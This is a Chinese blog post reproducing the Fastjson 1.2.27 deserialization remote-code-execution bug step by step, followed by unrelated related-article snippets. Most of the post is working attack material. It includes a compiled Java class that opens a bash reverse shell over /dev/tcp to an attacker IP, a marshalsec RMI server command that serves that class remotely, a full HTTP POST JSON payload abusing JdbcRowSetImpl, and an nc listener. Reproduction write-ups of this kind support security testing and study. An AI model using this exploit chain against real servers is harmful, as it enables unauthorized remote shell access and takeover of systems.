Fashjson1.2.27反序列化复现

简介: Fashjson1.2.27反序列化复现

  1、首先访问一下目标网址是否正常

640.png

   2、编译java攻击载荷,此代码为反弹shell

// javac exp.java
import java.lang.Runtime;
import java.lang.Process;
public class exp {
    static {
        try {
            Runtime rt =Runtime.getRuntime();
            String[]commands = {"/bin/bash","-c","bash -i >&/dev/tcp/192.168.124.129/6666 0>&1"};
            Process pc =rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

640.png

   3、在使用远程服务器开启web服务器,使得编译的文件能够被下载。

这里使用py来开启python -mSimpleHTTPServer 8080

640.png

访问目录,发现了文件

640.png

   4、再启动rmi服务,远程加载刚才开启的web服务

这里使用了marshalsec启动一个RMI服务器,或者ladp服务器。

下载地址:https://github.com/mbechler/marshalsec

下载后切换到marshalsec目录下使用maven进行打包。

mvn cleanpackage -DskipTests

编译完成后,再进行开启:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.RMIRefServer "http://192.168.124.133:8080/#exp" 9999

 640.png

   5、对目标站点发送payload

Payload:
POST / HTTP/1.1
Host: 192.168.124.145:8090
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 261
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
       "@type":"com.sun.rowset.JdbcRowSetImpl",
       "dataSourceName":"rmi://192.168.124.133:9999/exp",
        "autoCommit":true
    }
}

 640.png

在主机上进行监听6666端口,命令如下:

Nc -lvvp6666

发送payload后得到了shell

640.png



相关文章
|
Java
Mac 下安装jdk1.7(国内镜像)
Mac 下安装jdk1.7(国内镜像)
3813 0
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
22127 1
|
9月前
|
存储 运维 Serverless
🌤️ 玩转函数计算FC:无需服务器,三步实现每日天气邮件推送
一位开发者用57行代码、每周不到0.3元,借助阿里云函数计算FC,为团队搭建智能天气提醒系统。无需服务器运维,按需执行,自动定时推送邮件。本文详解从零搭建全过程,展现无服务器架构的高效与低成本,助你快速实现个性化定时任务。
|
9月前
|
缓存 API 数据安全/隐私保护
淘宝京东拼多多API应用差异大揭秘,商家必看!
本文深度解析淘宝、京东、拼多多三大电商API在接口风格、权限控制、数据推送等方面的差异,涵盖实战代码与成本优化策略,助力商家高效对接平台系统,提升运营效率。
|
SQL 安全
jeecg-boot sql注入漏洞解决
jeecg-boot sql注入漏洞解决
2050 0
|
设计模式 安全 JavaScript
jQuery-1.7.2 版本任意文件下载漏洞复现
jQuery-1.7.2 版本存在任意文件读取漏洞,攻击者可通过特定URL地址访问并获取敏感信息。
1604 1
|
安全 Java 数据安全/隐私保护
java JDWP调试接口任意命令执行漏洞
java JDWP调试接口任意命令执行漏洞
1383 1
|
机器学习/深度学习 分布式计算 Kubernetes
30分钟拉起Ray集群并部署Stable Diffusion模型服务
Ray 是一个支持模型训练、测试以及部署的开源平台,由加州大学伯克利分校的 RISELab 开发。它旨在简化大规模机器学习、强化学习和分布式计算任务的开发与部署。阿里云计算巢实现了Ray Cluster的一键部署,帮助用户能够便捷地使用分布式集群训练和测试自己的模型。